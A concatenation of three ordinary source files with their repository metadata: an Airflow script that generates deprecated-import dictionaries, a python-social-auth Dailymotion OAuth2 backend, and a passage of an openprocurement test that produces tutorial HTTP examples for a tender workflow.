'airflow/hooks/hive_hooks.py',
'airflow/hooks/http_hook.py',
'airflow/hooks/jdbc_hook.py',
'airflow/hooks/mssql_hook.py',
'airflow/hooks/mysql_hook.py',
'airflow/hooks/oracle_hook.py',
'airflow/hooks/pig_hook.py',
'airflow/hooks/postgres_hook.py',
'airflow/hooks/presto_hook.py',
'airflow/hooks/S3_hook.py',
'airflow/hooks/samba_hook.py',
'airflow/hooks/slack_hook.py',
'airflow/hooks/sqlite_hook.py',
'airflow/hooks/webhdfs_hook.py',
'airflow/hooks/zendesk_hook.py',
'airflow/operators/bash_operator.py',
'airflow/operators/branch_operator.py',
'airflow/operators/check_operator.py',
'airflow/operators/dagrun_operator.py',
'airflow/operators/docker_operator.py',
'airflow/operators/druid_check_operator.py',
'airflow/operators/dummy.py',
'airflow/operators/dummy_operator.py',
'airflow/operators/email_operator.py',
'airflow/operators/gcs_to_s3.py',
'airflow/operators/google_api_to_s3_transfer.py',
'airflow/operators/hive_operator.py',
'airflow/operators/hive_stats_operator.py',
'airflow/operators/hive_to_druid.py',
'airflow/operators/hive_to_mysql.py',
'airflow/operators/hive_to_samba_operator.py',
'airflow/operators/http_operator.py',
'airflow/operators/jdbc_operator.py',
'airflow/operators/latest_only_operator.py',
'airflow/operators/mssql_operator.py',
'airflow/operators/mssql_to_hive.py',
'airflow/operators/mysql_operator.py',
'airflow/operators/mysql_to_hive.py',
'airflow/operators/oracle_operator.py',
'airflow/operators/papermill_operator.py',
'airflow/operators/pig_operator.py',
'airflow/operators/postgres_operator.py',
'airflow/operators/presto_check_operator.py',
'airflow/operators/presto_to_mysql.py',
'airflow/operators/python_operator.py',
'airflow/operators/redshift_to_s3_operator.py',
'airflow/operators/s3_file_transform_operator.py',
'airflow/operators/s3_to_hive_operator.py',
'airflow/operators/s3_to_redshift_operator.py',
'airflow/operators/slack_operator.py',
'airflow/operators/sql.py',
'airflow/operators/sql_branch_operator.py',
'airflow/operators/sqlite_operator.py',
'airflow/operators/subdag_operator.py',
'airflow/sensors/base_sensor_operator.py',
'airflow/sensors/date_time_sensor.py',
'airflow/sensors/external_task_sensor.py',
'airflow/sensors/hdfs_sensor.py',
'airflow/sensors/hive_partition_sensor.py',
'airflow/sensors/http_sensor.py',
'airflow/sensors/metastore_partition_sensor.py',
'airflow/sensors/named_hive_partition_sensor.py',
'airflow/sensors/s3_key_sensor.py',
'airflow/sensors/sql.py',
'airflow/sensors/sql_sensor.py',
'airflow/sensors/time_delta_sensor.py',
'airflow/sensors/web_hdfs_sensor.py',
'airflow/utils/log/cloudwatch_task_handler.py',
'airflow/utils/log/es_task_handler.py',
'airflow/utils/log/gcs_task_handler.py',
'airflow/utils/log/s3_task_handler.py',
'airflow/utils/log/stackdriver_task_handler.py',
'airflow/utils/log/wasb_task_handler.py',
]
CONTRIB_FILES = (AIRFLOW_SOURCES_ROOT / "airflow" / "contrib").rglob("*.py")
if __name__ == '__main__':
console = Console(color_system="standard", width=300)
all_deprecated_imports: dict[str, dict[str, list[Import]]] = defaultdict(lambda: defaultdict(list))
# delete = True
delete = False
# for file in DEPRECATED_MODULES:
for file in CONTRIB_FILES:
file_path = AIRFLOW_SOURCES_ROOT / file
if not file_path.exists() or file.name == "__init__.py":
continue
original_module = os.fspath(file_path.parent.relative_to(AIRFLOW_SOURCES_ROOT)).replace(os.sep, ".")
for _import in get_imports(file_path):
module_name = file_path.name[: -len(".py")]
if _import.name not in ['warnings', 'RemovedInAirflow3Warning']:
all_deprecated_imports[original_module][module_name].append(_import)
if delete:
file_path.unlink()
for module_path, package_imports in all_deprecated_imports.items():
console.print(f"[yellow]Import dictionary for {module_path}:\n")
template = Environment(loader=BaseLoader()).from_string(DEPRECATED_CLASSES_TEMPLATE)
print(black_format(template.render(package_imports=dict(sorted(package_imports.items())))))
| {
"content_hash": "e146f65435dbb908bc34bab13170e2cb",
"timestamp": "",
"source": "github",
"line_count": 201,
"max_line_length": 110,
"avg_line_length": 37.766169154228855,
"alnum_prop": 0.6693452773020683,
"repo_name": "cfei18/incubator-airflow",
"id": "8fbe8290a3882ccf953d2297e2b50c1daf1ceb6a",
"size": "8376",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "dev/deprecations/generate_deprecated_dicts.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "25980"
},
{
"name": "Dockerfile",
"bytes": "72003"
},
{
"name": "HCL",
"bytes": "3786"
},
{
"name": "HTML",
"bytes": "173434"
},
{
"name": "JavaScript",
"bytes": "143068"
},
{
"name": "Jinja",
"bytes": "38808"
},
{
"name": "Jupyter Notebook",
"bytes": "5482"
},
{
"name": "Mako",
"bytes": "1339"
},
{
"name": "Python",
"bytes": "22660683"
},
{
"name": "R",
"bytes": "313"
},
{
"name": "Shell",
"bytes": "312715"
},
{
"name": "TypeScript",
"bytes": "472379"
}
],
"symlink_target": ""
} |
"""
DailyMotion OAuth2 backend, docs at:
https://python-social-auth.readthedocs.io/en/latest/backends/dailymotion.html
"""
from .oauth import BaseOAuth2
class DailymotionOAuth2(BaseOAuth2):
"""Dailymotion OAuth authentication backend"""
name = 'dailymotion'
EXTRA_DATA = [('id', 'id')]
ID_KEY = 'username'
AUTHORIZATION_URL = 'https://api.dailymotion.com/oauth/authorize'
REQUEST_TOKEN_URL = 'https://api.dailymotion.com/oauth/token'
ACCESS_TOKEN_URL = 'https://api.dailymotion.com/oauth/token'
ACCESS_TOKEN_METHOD = 'POST'
def get_user_details(self, response):
return {'username': response.get('screenname')}
def user_data(self, access_token, *args, **kwargs):
"""Return user data provided"""
return self.get_json('https://api.dailymotion.com/auth/',
params={'access_token': access_token})
| {
"content_hash": "5e54b8467dbbee69703c3ed6e7abf2d0",
"timestamp": "",
"source": "github",
"line_count": 24,
"max_line_length": 81,
"avg_line_length": 37.166666666666664,
"alnum_prop": 0.6603139013452914,
"repo_name": "tobias47n9e/social-core",
"id": "8f908bef3bc5d2c2a558d2ad07e7b2b26a099a85",
"size": "892",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "social_core/backends/dailymotion.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Makefile",
"bytes": "1462"
},
{
"name": "Python",
"bytes": "631379"
}
],
"symlink_target": ""
} |
import json
import os
import unittest
from datetime import timedelta
import openprocurement.tender.twostage.tests.base as base_test
from openprocurement.api.models import get_now
from openprocurement.api.tests.base import PrefixedRequestClass
from openprocurement.tender.twostage.tests.tender import BaseTenderWebTest
from webtest import TestApp
test_tender_data = {
"tenderPeriod": {
"endDate": "2016-02-11T14:04:18.962451"
},
"title": "Послуги шкільних їдалень",
"title_en": "Services in school canteens",
"minimalStep": {
"currency": "UAH",
"amount": 35
},
"procurementMethodType": "aboveThresholdTS",
"value": {
"currency": "UAH",
"amount": 500
},
"procuringEntity": {
"kind": "general",
"address": {
"countryName": "Україна",
"locality": "м. Вінниця",
"postalCode": "21027",
"region": "м. Вінниця",
"streetAddress": "вул. Стахурського. 22"
},
"contactPoint": {
"name": "Куца Світлана Валентинівна",
"name_en": "Kutsa Svitlana V.",
"telephone": "+380 (432) 46-53-02",
"availableLanguage": u"uk",
"url": "http://sch10.edu.vn.ua/"
},
"identifier": {
"id": "21725150",
"legalName": "Заклад \"Загальноосвітня школа І-ІІІ ступенів № 10 Вінницької міської ради\"",
"legalName_en": "The institution \"Secondary school I-III levels № 10 Vinnitsa City Council\"",
"scheme": "UA-EDR"
},
"name": "ЗОСШ #10 м.Вінниці",
"name_en": "School #10 of Vinnytsia"
},
"items": [
{
"unit": {
"code": "44617100-9",
"name": "item"
},
"additionalClassifications": [
{
"scheme": "ДКПП",
"id": "17.21.1",
"description": "Послуги шкільних їдалень"
}
],
"description": "Послуги шкільних їдалень",
"description_en": "Services in school canteens",
"classification": {
"scheme": "CPV",
"id": "37810000-9",
"description": "Test"
},
"deliveryDate": {
"startDate": (get_now() + timedelta(days=20)).isoformat(),
"endDate": (get_now() + timedelta(days=50)).isoformat()
},
"deliveryAddress": {
"countryName": u"Україна",
"postalCode": "79000",
"region": u"м. Київ",
"locality": u"м. Київ",
"streetAddress": u"вул. Банкова 1"
},
"quantity": 1
}, {
"unit": {
"code": "44617100-9",
"name": "item"
},
"additionalClassifications": [
{
"scheme": "ДКПП",
"id": "17.21.1",
"description": "Послуги шкільних їдалень"
}
],
"description": "Послуги шкільних їдалень",
"description_en": "Services in school canteens",
"classification": {
"scheme": "CPV",
"id": "37810000-9",
"description": "Test"
},
"quantity": 1,
"deliveryDate": {
"startDate": (get_now() + timedelta(days=20)).isoformat(),
"endDate": (get_now() + timedelta(days=50)).isoformat()
},
"deliveryAddress": {
"countryName": u"Україна",
"postalCode": "79000",
"region": u"м. Київ",
"locality": u"м. Київ",
"streetAddress": u"вул. Банкова 1"
}
}
]
}
test_tender_data["tenderPeriod"] = {
"endDate": (get_now() + timedelta(days=31)).isoformat()
}
bid = {
"data": {
"tenderers": [
{
"address": {
"countryName": "Україна",
"locality": "м. Вінниця",
"postalCode": "21100",
"region": "м. Вінниця",
"streetAddress": "вул. Островського, 33"
},
"contactPoint": {
"email": "soleksuk@gmail.com",
"name": "Сергій Олексюк",
"telephone": "+380 (432) 21-69-30"
},
"identifier": {
"scheme": u"UA-EDR",
"id": u"00137256",
"uri": u"http://www.sc.gov.ua/"
},
"name": "ДКП «Школяр»"
}
],
"value": {
"amount": 500
},
"status": "draft",
}
}
bid2 = {
"data": {
"tenderers": [
{
"address": {
"countryName": "Україна",
"locality": "м. Львів",
"postalCode": "79013",
"region": "м. Львів",
"streetAddress": "вул. Островського, 34"
},
"contactPoint": {
"email": "aagt@gmail.com",
"name": "Андрій Олексюк",
"telephone": "+380 (322) 91-69-30"
},
"identifier": {
"scheme": u"UA-EDR",
"id": u"00137226",
"uri": u"http://www.sc.gov.ua/"
},
"name": "ДКП «Книга»"
}
],
"value": {
"amount": 499
},
}
}
bid3 = {
"data": {
"tenderers": [
{
"address": {
"countryName": "Україна",
"locality": "м. Львів",
"postalCode": "79013",
"region": "м. Львів",
"streetAddress": "вул. Островського, 35"
},
"contactPoint": {
"email": "fake@mail.com",
"name": "Іван Іваненко",
"telephone": "+380 (322) 12-34-56"
},
"identifier": {
"scheme": u"UA-EDR",
"id": u"00137226",
"uri": u"http://www.sc.gov.ua/"
},
"name": "«Снігур»"
}
],
"value": {
"amount": 5
},
}
}
question = {
"data": {
"author": {
"address": {
"countryName": "Україна",
"locality": "м. Вінниця",
"postalCode": "21100",
"region": "м. Вінниця",
"streetAddress": "вул. Островського, 33"
},
"contactPoint": {
"email": "soleksuk@gmail.com",
"name": "Сергій Олексюк",
"telephone": "+380 (432) 21-69-30"
},
"identifier": {
"id": "00137226",
"legalName": "Державне комунальне підприємство громадського харчування «Школяр»",
"scheme": "UA-EDR",
"uri": "http://sch10.edu.vn.ua/"
},
"name": "ДКП «Школяр»"
},
"description": "Просимо додати таблицю потрібної калорійності харчування",
"title": "Калорійність"
}
}
answer = {
"data": {
"answer": "Таблицю додано в файлі \"Kalorijnist.xslx\""
}
}
cancellation = {
'data': {
'reason': 'cancellation reason'
}
}
complaint = {
"data": {
"author": {
"address": {
"countryName": "Україна",
"locality": "м. Вінниця",
"postalCode": "21100",
"region": "м. Вінниця",
"streetAddress": "вул. Островського, 33"
},
"contactPoint": {
"email": "soleksuk@gmail.com",
"name": "Сергій Олексюк",
"telephone": "+380 (432) 21-69-30"
},
"identifier": {
"id": "13313462",
"legalName": "Державне комунальне підприємство громадського харчування «Школяр»",
"scheme": "UA-EDR",
"uri": "http://sch10.edu.vn.ua/"
},
"name": "ДКП «Школяр»"
},
"description": "Умови виставлені замовником не містять достатньо інформації, щоб заявка мала сенс.",
"title": "Недостатньо інформації"
}
}
test_lots = [
{
'title': 'Лот №1',
'description': 'Опис Лот №1',
'value': test_tender_data['value'],
'minimalStep': test_tender_data['minimalStep'],
},
{
'title': 'Лот №2',
'description': 'Опис Лот №2',
'value': test_tender_data['value'],
'minimalStep': test_tender_data['minimalStep'],
}
]
class DumpsTestAppwebtest(TestApp):
def do_request(self, req, status=None, expect_errors=None):
req.headers.environ["HTTP_HOST"] = "api-sandbox.openprocurement.org"
if hasattr(self, 'file_obj') and not self.file_obj.closed:
self.file_obj.write(req.as_bytes(True))
self.file_obj.write("\n")
if req.body:
try:
self.file_obj.write(
'DATA:\n' + json.dumps(json.loads(req.body), indent=2, ensure_ascii=False).encode('utf8'))
self.file_obj.write("\n")
except:
pass
self.file_obj.write("\n")
resp = super(DumpsTestAppwebtest, self).do_request(req, status=status, expect_errors=expect_errors)
if hasattr(self, 'file_obj') and not self.file_obj.closed:
headers = [(n.title(), v)
for n, v in resp.headerlist
if n.lower() != 'content-length']
headers.sort()
self.file_obj.write(str('Response: %s\n%s\n') % (
resp.status,
str('\n').join([str('%s: %s') % (n, v) for n, v in headers]),
))
if resp.testbody:
try:
self.file_obj.write(json.dumps(json.loads(resp.testbody), indent=2, ensure_ascii=False).encode('utf8'))
except:
pass
self.file_obj.write("\n\n")
return resp
class TenderResourceTest(BaseTenderWebTest):
initial_data = test_tender_data
def setUp(self):
self.app = DumpsTestAppwebtest(
"config:tests.ini", relative_to=os.path.dirname(base_test.__file__))
self.app.RequestClass = PrefixedRequestClass
self.app.authorization = ('Basic', ('broker', ''))
self.couchdb_server = self.app.app.registry.couchdb_server
self.db = self.app.app.registry.db
def test_docs(self):
request_path = '/tenders?opt_pretty=1'
#### Exploring basic rules
#
with open('docs/source/tutorial/tender-listing.http', 'w') as self.app.file_obj:
self.app.authorization = None
response = self.app.get(request_path)
self.assertEqual(response.status, '200 OK')
self.app.file_obj.write("\n")
with open('docs/source/tutorial/tender-post-attempt.http', 'w') as self.app.file_obj:
response = self.app.post(request_path, 'data', status=415)
self.assertEqual(response.status, '415 Unsupported Media Type')
self.app.authorization = ('Basic', ('broker', ''))
with open('docs/source/tutorial/tender-post-attempt-json.http', 'w') as self.app.file_obj:
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.post(
request_path, 'data', content_type='application/json', status=422)
self.assertEqual(response.status, '422 Unprocessable Entity')
#### Creating tender
#
with open('docs/source/tutorial/tender-post-attempt-json-data.http', 'w') as self.app.file_obj:
response = self.app.post_json('/tenders?opt_pretty=1', {"data": test_tender_data})
self.assertEqual(response.status, '201 Created')
tender = response.json['data']
owner_token = response.json['access']['token']
with open('docs/source/tutorial/blank-tender-view.http', 'w') as self.app.file_obj:
response = self.app.get('/tenders/{}'.format(tender['id']))
self.assertEqual(response.status, '200 OK')
with open('docs/source/tutorial/tender-listing-no-auth.http', 'w') as self.app.file_obj:
self.app.authorization = None
response = self.app.get(request_path)
self.assertEqual(response.status, '200 OK')
self.app.authorization = ('Basic', ('broker', ''))
#### Modifying tender
#
tenderPeriod_endDate = get_now() + timedelta(days=30, seconds=10)
with open('docs/source/tutorial/patch-items-value-periods.http', 'w') as self.app.file_obj:
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(tender['id'], owner_token), {'data':
{
"tenderPeriod": {
"endDate": tenderPeriod_endDate.isoformat()
}
}
})
with open('docs/source/tutorial/tender-listing-after-patch.http', 'w') as self.app.file_obj:
self.app.authorization = None
response = self.app.get(request_path)
self.assertEqual(response.status, '200 OK')
self.app.authorization = ('Basic', ('broker', ''))
self.tender_id = tender['id']
# Setting Bid guarantee
#
with open('docs/source/tutorial/set-bid-guarantee.http', 'w') as self.app.file_obj:
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(
self.tender_id, owner_token), {"data": {"guarantee": {"amount": 8, "currency": "USD"}}})
self.assertEqual(response.status, '200 OK')
self.assertIn('guarantee', response.json['data'])
#### Uploading documentation
#
with open('docs/source/tutorial/upload-tender-notice.http', 'w') as self.app.file_obj:
response = self.app.post('/tenders/{}/documents?acc_token={}'.format(
self.tender_id, owner_token), upload_files=[('file', u'Notice.pdf', 'content')])
self.assertEqual(response.status, '201 Created')
doc_id = response.json["data"]["id"]
with open('docs/source/tutorial/tender-documents.http', 'w') as self.app.file_obj:
response = self.app.get('/tenders/{}/documents/{}?acc_token={}'.format(
self.tender_id, doc_id, owner_token))
self.assertEqual(response.status, '200 OK')
with open('docs/source/tutorial/upload-award-criteria.http', 'w') as self.app.file_obj:
response = self.app.post('/tenders/{}/documents?acc_token={}'.format(
self.tender_id, owner_token), upload_files=[('file', u'AwardCriteria.pdf', 'content')])
self.assertEqual(response.status, '201 Created')
doc_id = response.json["data"]["id"]
with open('docs/source/tutorial/tender-documents-2.http', 'w') as self.app.file_obj:
response = self.app.get('/tenders/{}/documents?acc_token={}'.format(
self.tender_id, owner_token))
self.assertEqual(response.status, '200 OK')
with open('docs/source/tutorial/update-award-criteria.http', 'w') as self.app.file_obj:
response = self.app.put('/tenders/{}/documents/{}?acc_token={}'.format(
self.tender_id, doc_id, owner_token), upload_files=[('file', 'AwardCriteria-2.pdf', 'content2')])
self.assertEqual(response.status, '200 OK')
with open('docs/source/tutorial/tender-documents-3.http', 'w') as self.app.file_obj:
response = self.app.get('/tenders/{}/documents'.format(
self.tender_id))
self.assertEqual(response.status, '200 OK')
#### Enquiries
#
with open('docs/source/tutorial/ask-question.http', 'w') as self.app.file_obj:
response = self.app.post_json('/tenders/{}/questions'.format(
self.tender_id), question, status=201)
question_id = response.json['data']['id']
self.assertEqual(response.status, '201 Created')
with open('docs/source/tutorial/answer-question.http', 'w') as self.app.file_obj:
response = self.app.patch_json('/tenders/{}/questions/{}?acc_token={}'.format(
self.tender_id, question_id, owner_token), answer, status=200)
self.assertEqual(response.status, '200 OK')
with open('docs/source/tutorial/list-question.http', 'w') as self.app.file_obj:
response = self.app.get('/tenders/{}/questions'.format(
self.tender_id))
self.assertEqual(response.status, '200 OK')
with open('docs/source/tutorial/get-answer.http', 'w') as self.app.file_obj:
response = self.app.get('/tenders/{}/questions/{}'.format(
self.tender_id, question_id))
self.assertEqual(response.status, '200 OK')
self.time_shift('enquiryPeriod_ends')
self.app.authorization = ('Basic', ('broker', ''))
with open('docs/source/tutorial/update-tender-after-enqiery.http', 'w') as self.app.file_obj:
response = self.app.get('/tenders/{}?acc_token={}'.format(tender['id'], owner_token))
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(tender['id'], owner_token),
{'data': {"value": {'amount': 501.0}}}, status=403)
self.assertEqual(response.status, '403 Forbidden')
with open('docs/source/tutorial/ask-question-after-enquiry-period.http', 'w') as self.app.file_obj:
response = self.app.post_json('/tenders/{}/questions'.format(
self.tender_id), question, status=403)
self.assertEqual(response.status, '403 Forbidden')
with open('docs/source/tutorial/update-tender-after-enqiery-with-update-periods.http', 'w') as self.app.file_obj:
tenderPeriod_endDate = get_now() + timedelta(days=8)
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(tender['id'], owner_token), {'data':
{
"value": {
"amount": 501,
"currency": u"UAH"
},
"tenderPeriod": {
"endDate": tenderPeriod_endDate.isoformat()
}
}
})
self.assertEqual(response.status, '200 OK')
#### Registering bid
#
bids_access = {}
with open('docs/source/tutorial/register-bidder.http', 'w') as self.app.file_obj:
response = self.app.post_json('/tenders/{}/bids'.format(
self.tender_id), bid)
bid1_id = response.json['data']['id']
bids_access[bid1_id] = response.json['access']['token']
self.assertEqual(response.status, '201 Created')
with open('docs/source/tutorial/activate-bidder.http', 'w') as self.app.file_obj:
response = self.app.patch_json('/tenders/{}/bids/{}?acc_token={}'.format(
self.tender_id, bid1_id, bids_access[bid1_id]), {"data": {"status": "pending"}})
self.assertEqual(response.status, '200 OK')
#### Proposal Uploading
#
with open('docs/source/tutorial/upload-bid-proposal.http', 'w') as self.app.file_obj:
response = self.app.post('/tenders/{}/bids/{}/documents?acc_token={}'.format(
self.tender_id, bid1_id, bids_access[bid1_id]), upload_files=[('file', 'Proposal.pdf', 'content')])
self.assertEqual(response.status, '201 Created')
with open('docs/source/tutorial/upload-bid-private-proposal.http', 'w') as self.app.file_obj:
response = self.app.post('/tenders/{}/bids/{}/documents?acc_token={}'.format(
self.tender_id, bid1_id, bids_access[bid1_id]), upload_files=[('file', 'Proposal_top_secrets.pdf', 'content')])
self.assertEqual(response.status, '201 Created')
priv_doc_id = response.json['data']['id']
# set confidentiality properties
with open('docs/source/tutorial/mark-bid-doc-private.http', 'w') as self.app.file_obj:
response = self.app.patch_json('/tenders/{}/bids/{}/documents/{}?acc_token={}'.format(
self.tender_id, bid1_id, priv_doc_id, bids_access[bid1_id]), {'data': {
'confidentiality': 'buyerOnly',
'confidentialityRationale': 'Only our company sells badgers with pink hair.',
}})
self.assertEqual(response.status, '200 OK')
with open('docs/source/tutorial/upload-bid-financial-document-proposal.http', 'w') as self.app.file_obj:
response = self.app.post('/tenders/{}/bids/{}/financial_documents?acc_token={}'.format(
self.tender_id, bid1_id, bids_access[bid1_id]), upload_files=[('file', 'financial_doc.pdf', '1000$')])
self.assertEqual(response.status, '201 Created')
financial_doc_id = response.json['data']['id']
response = self.app.post('/tenders/{}/bids/{}/financial_documents?acc_token={}'.format(
self.tender_id, bid1_id, bids_access[bid1_id]), upload_files=[('file', 'financial_doc2.pdf', '1000$')])
self.assertEqual(response.status, '201 Created')
financial_doc_id = response.json['data']['id']
with open('docs/source/tutorial/bidder-financial-documents.http', 'w') as self.app.file_obj:
response = self.app.get('/tenders/{}/bids/{}/financial_documents?acc_token={}'.format(
self.tender_id, bid1_id, bids_access[bid1_id]))
self.assertEqual(response.status, '200 OK')
#with open('docs/source/tutorial/upload-bid-eligibility-document-proposal.http', 'w') as self.app.file_obj:
# response = self.app.post('/tenders/{}/bids/{}/eligibility_documents?acc_token={}'.format(
# self.tender_id, bid1_id, bids_access[bid1_id]), upload_files=[('file', 'eligibility_doc.pdf', 'content')])
# self.assertEqual(response.status, '201 Created')
# eligibility_doc_id = response.json['data']['id']
#with open('docs/source/tutorial/upload-bid-qualification-document-proposal.http', 'w') as self.app.file_obj:
# response = self.app.post('/tenders/{}/bids/{}/qualification_documents?acc_token={}'.format(
# self.tender_id, bid1_id, bids_access[bid1_id]), upload_files=[('file', 'qualification_document.pdf', 'content')])
# self.assertEqual(response.status, '201 Created')
with open('docs/source/tutorial/bidder-view-financial-documents.http', 'w') as self.app.file_obj:
response = self.app.get('/tenders/{}/bids/{}?acc_token={}'.format(
self.tender_id, bid1_id, bids_access[bid1_id]))
self.assertEqual(response.status, '200 OK')
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(tender['id'], owner_token),
{'data': {"value": {'amount': 501.0}}})
self.assertEqual(response.status, '200 OK')
#### Bid invalidation
#
with open('docs/source/tutorial/bidder-after-changing-tender.http', 'w') as self.app.file_obj:
response = self.app.get('/tenders/{}/bids/{}?acc_token={}'.format(
self.tender_id, bid1_id, bids_access[bid1_id]))
self.assertEqual(response.status, '200 OK')
#### Bid confirmation
#
with open('docs/source/tutorial/bidder-activate-after-changing-tender.http', 'w') as self.app.file_obj:
response = self.app.patch_json('/tenders/{}/bids/{}?acc_token={}'.format(
self.tender_id, bid1_id, bids_access[bid1_id]), {'data': {"status": "pending"}})
self.assertEqual(response.status, '200 OK')
# with open('docs/source/tutorial/bidder-after-activate-bid-tender.http', 'w') as self.app.file_obj:
# response = self.app.get('/tenders/{}/bids/{}?acc_token={}'.format(
# self.tender_id, bid1_id, bids_access[bid1_id]))
# self.assertEqual(response.status, '200 OK')
# tutorial/register-2nd-bidder.http
with open('docs/source/tutorial/register-2nd-bidder.http', 'w') as self.app.file_obj:
response = self.app.post_json('/tenders/{}/bids'.format(
self.tender_id), bid2)
bid2_id = response.json['data']['id']
bids_access[bid2_id] = response.json['access']['token']
self.assertEqual(response.status, '201 Created')
with open('docs/source/tutorial/register-3rd-bidder.http', 'w') as self.app.file_obj:
response = self.app.post_json('/tenders/{}/bids'.format(
self.tender_id), bid3)
bid3_id = response.json['data']['id']
bids_access[bid3_id] = response.json['access']['token']
self.assertEqual(response.status, '201 Created')
# Pre-qualification
self.set_status('active.pre-qualification', {"id": self.tender_id, 'status': 'active.tendering'})
auth = self.app.authorization
self.app.authorization = ('Basic', ('chronograph', ''))
response = self.app.patch_json('/tenders/{}'.format(self.tender_id), {"data": {"id": self.tender_id}})
self.app.authorization = auth
with open('docs/source/tutorial/qualifications-listing.http', 'w') as self.app.file_obj:
response = self.app.get('/tenders/{}'.format(
self.tender_id))
self.assertEqual(response.status, "200 OK")
qualifications = response.json['data']['qualifications']
self.assertEqual(len(qualifications), 3)
self.assertEqual(qualifications[0]['bidID'], bid1_id)
self.assertEqual(qualifications[1]['bidID'], bid2_id)
self.assertEqual(qualifications[2]['bidID'], bid3_id)
with open('docs/source/tutorial/approve-qualification1.http', 'w') as self.app.file_obj:
response = self.app.patch_json('/tenders/{}/qualifications/{}?acc_token={}'.format(self.tender_id, qualifications[0]['id'],
owner_token), {"data": {"status": "active"}})
self.assertEqual(response.status, "200 OK")
with open('docs/source/tutorial/approve-qualification2.http', 'w') as self.app.file_obj:
response = self.app.patch_json('/tenders/{}/qualifications/{}?acc_token={}'.format(self.tender_id, qualifications[1]['id'],
owner_token), {"data": {"status": "active"}})
self.assertEqual(response.status, "200 OK")
with open('docs/source/tutorial/reject-qualification3.http', 'w') as self.app.file_obj:
response = self.app.patch_json('/tenders/{}/qualifications/{}?acc_token={}'.format(self.tender_id, qualifications[2]['id'],
owner_token), {"data": {"status": "unsuccessful"}})
self.assertEqual(response.status, "200 OK")
with open('docs/source/tutorial/qualificated-bids-view.http', 'w') as self.app.file_obj:
response = self.app.get('/tenders/{}/bids?acc_token={}'.format(
self.tender_id, owner_token))
self.assertEqual(response.status, "200 OK")
with open('docs/source/tutorial/rejected-bid-view.http', 'w') as self.app.file_obj:
response = self.app.get('/tenders/{}/bids/{}?acc_token={}'.format(
self.tender_id, bid3_id, owner_token))
self.assertEqual(response.status, "200 OK")
# active.pre-qualification.stand-still
with open('docs/source/tutorial/pre-qualification-confirmation.http', 'w') as self.app.file_obj:
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(self.tender_id, owner_token),
{"data": {"status": "active.pre-qualification.stand-still"}})
self.assertEqual(response.status, "200 OK")
self.assertEqual(response.json['data']['status'], "active.pre-qualification.stand-still")
#### Auction
self.set_status('active.auction')
self.app.authorization = ('Basic', ('auction', ''))
patch_data = {
'auctionUrl': u'http://auction-sandbox.openprocurement.org/tenders/{}'.format(self.tender_id),
'bids': [
{
"id": bid1_id,
"participationUrl": u'http://auction-sandbox.openprocurement.org/tenders/{}?key_for_bid={}'.format(self.tender_id, bid1_id)
},
{
"id": bid2_id,
"participationUrl": u'http://auction-sandbox.openprocurement.org/tenders/{}?key_for_bid={}'.format(self.tender_id, bid2_id)
},
{
"id": bid3_id
}
]
}
response = self.app.patch_json('/tenders/{}/auction?acc_token={}'.format(self.tender_id, owner_token),
{'data': patch_data})
self.assertEqual(response.status, '200 OK')
self.app.authorization = ('Basic', ('broker', ''))
with open('docs/source/tutorial/auction-url.http', 'w') as self.app.file_obj:
response = self.app.get('/tenders/{}'.format(self.tender_id))
self.assertEqual(response.status, '200 OK')
with open('docs/source/tutorial/bidder-participation-url.http', 'w') as self.app.file_obj:
response = self.app.get('/tenders/{}/bids/{}?acc_token={}'.format(self.tender_id, bid1_id, bids_access[bid1_id]))
self.assertEqual(response.status, '200 OK')
with open('docs/source/tutorial/bidder2-participation-url.http', 'w') as self.app.file_obj:
response = self.app.get('/tenders/{}/bids/{}?acc_token={}'.format(self.tender_id, bid2_id, bids_access[bid2_id]))
self.assertEqual(response.status, '200 OK')
#### Confirming qualification
#
# self.set_status('active.qualification')
self.app.authorization = ('Basic', ('auction', ''))
response = self.app.get('/tenders/{}/auction'.format(self.tender_id))
auction_bids_data = response.json['data']['bids']
response = self.app.post_json('/tenders/{}/auction'.format(self.tender_id),
{'data': {'bids': auction_bids_data}})
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.get('/tenders/{}/awards?acc_token={}'.format(self.tender_id, owner_token))
# get pending award
award_id = [i['id'] for i in response.json['data'] if i['status'] == 'pending'][0]
with open('docs/source/tutorial/confirm-qualification.http', 'w') as self.app.file_obj:
self.app.patch_json('/tenders/{}/awards/{}?acc_token={}'.format(self.tender_id, award_id, owner_token), {"data": {"status": "active"}})
self.assertEqual(response.status, '200 OK')
response = self.app.get('/tenders/{}/contracts?acc_token={}'.format(
self.tender_id, owner_token))
self.contract_id = response.json['data'][0]['id']
#### Set contract value
tender = self.db.get(self.tender_id)
for i in tender.get('awards', []):
i['complaintPeriod']['endDate'] = i['complaintPeriod']['startDate']
self.db.save(tender)
with open('docs/source/tutorial/tender-contract-set-contract-value.http', 'w') as self.app.file_obj:
response = self.app.patch_json('/tenders/{}/contracts/{}?acc_token={}'.format(
self.tender_id, self.contract_id, owner_token), {"data": {"contractNumber": "contract#1", "value": {"amount": 238}}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.json['data']['value']['amount'], 238)
#### Setting contract signature date
#
with open('docs/source/tutorial/tender-contract-sign-date.http', 'w') as self.app.file_obj:
response = self.app.patch_json('/tenders/{}/contracts/{}?acc_token={}'.format(
self.tender_id, self.contract_id, owner_token), {'data': {"dateSigned": get_now().isoformat()} })
self.assertEqual(response.status, '200 OK')
#### Setting contract period
period_dates = {"period": {"startDate": (get_now()).isoformat(), "endDate": (get_now() + timedelta(days=365)).isoformat()}}
with open('docs/source/tutorial/tender-contract-period.http', 'w') as self.app.file_obj:
response = self.app.patch_json('/tenders/{}/contracts/{}?acc_token={}'.format(
self.tender_id, self.contract_id, owner_token), {'data': {'period': period_dates["period"]}})
self.assertEqual(response.status, '200 OK')
#### Uploading contract documentation
#
with open('docs/source/tutorial/tender-contract-upload-document.http', 'w') as self.app.file_obj:
